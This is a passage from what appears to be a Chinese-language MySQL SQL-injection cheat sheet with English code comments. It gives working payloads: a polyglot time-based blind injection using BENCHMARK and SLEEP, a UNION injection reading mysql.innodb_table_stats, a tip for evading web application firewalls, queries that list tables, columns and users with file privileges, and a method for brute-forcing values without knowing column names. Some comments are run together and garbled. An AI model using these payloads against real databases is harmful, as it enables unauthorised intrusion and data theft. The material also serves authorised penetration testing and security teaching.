SELECT*FROM some_table WHERE double_quotes ="IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
请记住,在“现代”版本的 MySQL 中,您可以将 "information_schema.tables" 替换为 "mysql.innodb_table_stats"(这可能有助于绕过 WAF)。
SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Getname of the tablesSELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Getname of the columns of the tableSELECT<COLUMN1>,<COLUMN2>FROM<TABLE_NAME>; #GetvaluesSELECT user FROM mysql.user WHERE file_priv='Y'; #Users withfile privileges
-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#
检索没有列名的值
如果在某个时刻你知道表的名称,但不知道表内列的名称,你可以尝试执行类似的操作来查找有多少列:
# When a True is returned, you have found the number of columnsselect (select "", "") = (SELECT*fromdemolimit1); # 2columnsselect (select "", "", "") < (SELECT*fromdemolimit1); # 3columns
假设有2列(第一列是ID),另一列是标志,你可以尝试逐个字符地暴力破解标志的内容:
# When True, you found the correct char and can start ruteforcing the next positionselect (select 1, 'flaf') = (SELECT*fromdemolimit1);